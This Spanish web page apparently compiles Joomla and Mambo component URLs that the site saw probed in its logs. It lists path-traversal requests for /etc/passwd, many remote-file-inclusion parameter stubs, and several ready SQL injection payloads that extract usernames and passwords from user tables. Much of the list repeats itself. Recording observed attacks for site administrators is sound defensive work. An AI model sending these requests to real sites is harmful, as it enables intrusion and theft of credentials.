] > Listado de componentes con posibles vulnerabilidades - MIRULU INFORMATIZATE
 [+]
 

Listado de componentes con posibles vulnerabilidades

| PDF| Imprimir |

Este artículo es un recopilatorio de los componentes de joomla que hemos ido encontrando con posibles vulnerabilidades. La mayoría de ellos se han sacado de los logs de mirulu.

  1. /components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
  2. /templates/be2004-2/index.php?mosConfig_absolute_path=
  3. /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
  4. /libraries/pcl/pcltar.php?g_pcltar_lib_dir=
  5. /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=
  6. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
  7. /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
  8. /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
  9. /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
  10. /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
  11. /components/com_mambowiki/MamboLogin.php?IP=
  12. /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
  13. /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
  14. /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
  15. /components/com_cpg/cpg.php?mosConfig_absolute_path=
  16. /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
  17. /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
  18. /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
  19. /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
  20. /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
  21. /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
  22. /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
  23. /components/com_securityimages/configinsert.php?mosConfig_absolute_path=
  24. /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
  25. /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
  26. /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
  27. /components/com_moodle/moodle.php?mosConfig_absolute_path=
  28. /components/com_mospray/scripts/admin.php?basedir=
  29. /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
  30. /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
  31. /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
  32. /components/com_hashcash/server.php?mosConfig_absolute_path=
  33. /components/com_minibb.php?absolute_path=
  34. /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
  35. /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
  36. /components/calendar/com_calendar.php?absolute_path=
  37. /modules/calendar/mod_calendar.php?absolute_path=
  38. /components/com_calendar.php?absolute_path=
  39. /modules/mod_calendar.php?absolute_path=
  40. /modules/mod_weather.php?absolute_path=
  41. /components/minibb/index.php?absolute_path=
  42. /components/com_performs/performs.php?mosConfig_absolute_path=
  43. /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
  44. /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
  45. /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
  46. /components/com_smf/smf.php?mosConfig_absolute_path=
  47. /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
  48. /components/com_forum/download.php?phpbb_root_path=
  49. /components/com_simpleboard/image_upload.php?sbp=
  50. /components/com_galleria/galleria.html.php?mosConfig_absolute_path=
  51. /includes/functions_cms.php?phpbb_root_path=
  52. /includes/adminAvatars.php?GlobalSettings[templatesDirectory]=
  53. /includes/adminSmileys.php?GlobalSettings[templatesDirectory]=
  54. /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
  55. /modules/mod_as_category.php?mosConfig_absolute_path=
  56. /includes/move.php?GlobalSettings[templatesDirectory]=
  57. /mod_cbsms_messages.php?mosConfig_absolute_path=
  58. /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
  59. /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
  60. /component/com_events/includes/comutils.php?mosConfig_absolute_path=
  61. /administrator/components/com_expose/uploadimg.php
  62. /modules/mod_header_image.php?mosConfig_absolute_path=
  63. /index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,5, username,char(32,112,97,115,115,119,111,114,100,5,password),5,0,0%20from%20jos_users/*
  64. /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
  65. /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
  66. /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
  67. /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
  68. /administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
  69. /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
  70. /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
  71. /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
  72. /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
  73. /components/com_jcs/jcs.function.php?mosConfig_absolute_path=
  74. /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
  75. /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
  76. /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
  77. /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
  78. /administrator/components/com_color/admin.color.php?mosConfig_live_site= 
  79. /index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=
  80. /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=
  81. /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=
  82. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
  83. /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
  84. /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
  85. /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
  86. /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
  87. /components/com_mambowiki/MamboLogin.php?IP=
  88. /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
  89. /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
  90. /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
  91. /components/com_cpg/cpg.php?mosConfig_absolute_path=
  92. /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
  93. /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
  94. /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
  95. /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
  96. /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
  97. /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
  98. /components/com_securityimages/configinsert.php?mosConfig_absolute_path=
  99. /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
  100. /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
  101. /components/com_moodle/moodle.php?mosConfig_absolute_path=
  102. /components/com_mospray/scripts/admin.php?basedir=
  103. /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
  104. /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
  105. /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
  106. /components/com_hashcash/server.php?mosConfig_absolute_path=
  107. /components/com_minibb.php?absolute_path=
  108. /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
  109. /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
  110. /components/calendar/com_calendar.php?absolute_path=
  111. /modules/calendar/mod_calendar.php?absolute_path=
  112. /components/com_calendar.php?absolute_path=
  113. /modules/mod_calendar.php?absolute_path=
  114. /modules/mod_weather.php?absolute_path=
  115. /components/minibb/index.php?absolute_path=
  116. /components/com_performs/performs.php?mosConfig_absolute_path=
  117. /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
  118. /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
  119. /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
  120. /components/com_smf/smf.php?mosConfig_absolute_path=
  121. /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
  122. /components/com_forum/download.php?phpbb_root_path=
  123. /components/com_simpleboard/image_upload.php?sbp=
  124. /components/com_galleria/galleria.html.php?mosConfig_absolute_path=
  125. /includes/functions_cms.php?phpbb_root_path=
  126. /includes/adminAvatars.php?GlobalSettings[templatesDirectory]=
  127. /includes/adminSmileys.php?GlobalSettings[templatesDirectory]=
  128. /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
  129. /modules/mod_as_category.php?mosConfig_absolute_path=
  130. /includes/move.php?GlobalSettings[templatesDirectory]=
  131. /mod_cbsms_messages.php?mosConfig_absolute_path=
  132. /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
  133. /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
  134. /component/com_events/includes/comutils.php?mosConfig_absolute_path=
  135. /administrator/components/com_expose/uploadimg.php  
  136. /modules/mod_header_image.php?mosConfig_absolute_path=
  137. /index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58), username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*
  138. /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
  139. /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
  140. /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
  141. /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
  142. /administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
  143. /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
  144. /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
  145. /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
  146. /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
  147. /components/com_jcs/jcs.function.php?mosConfig_absolute_path=
  148. /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
  149. /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
  150. /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
  151. /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
  152. /administrator/components/com_color/admin.color.php?mosConfig_live_site=
  153. /templates/ytw_9kred/index.php
  154. /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=
  155. /index.php?option=com_yanc&act=subscriber&task=
  156. /index.php?option=com_remository&Itemid=0&func=select&id=0
  157. /index.php?option=com_yanc&act=archive&task=forward&cid=7&Itemid=99999999&no_html=
  158. /index.php?option=com_gallery=&sectionid=&id=&mosConfig_absolute_path=
  159. /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=
  160. /index.php?option=com_jpad&task=edit&Itemid=39&cid=
  161. /index.php?option=com_yanc&Itemid=9999999& listid=99 99999/**/union/**/select/**/name,password/**/from/**/mos_users/*
  162. /index.php?option=com_gmaps&task=viewmap&Itemid=57& mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
  163. /index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mos_users/*
  164. /index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=
  165. /index.php?option=com_poll&task=results&id=14&mosConfig_absolute_path=
  166. /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=
  167. /index.php?option=com_content&task=view&id=26&Itemid=2/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path= 
  168. /index.php?option=com_content&task=view&id=26&Itemid=2//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
  169. /index.php?option=com_content&task=view&id=26&Itemid=2//components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
  170. /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=
  171. /index.php?option=com_content&task=view&id=26&Itemid=2/components/com_mp3_allopass/allopass.php?mosConfig_live_site=
  172. /index.php?option=com_content&task=view&id=26&Itemid=2/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= 
  173. /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path= 
  174. /index.php?option=com_content&task=view&id=26&Itemid=2//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
  175. /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=
  176. /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path= 
  177. /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=
  178. /components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=
  179. /components/com_facileforms/facileforms.frame.php?ff_compath= 
  180. /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid= S@BUN&cat_id=-9999999/**/union/**/select/**/ 000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*
  181. /index.php?option=com_panoramic&Itemid=&mosConfig_absolute_path=
  182. /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
  183. /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=
  184. /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_absolute_path=
  185. /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= 
  186. /index.php?option=com_marketplace&page=show_category&catid=9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--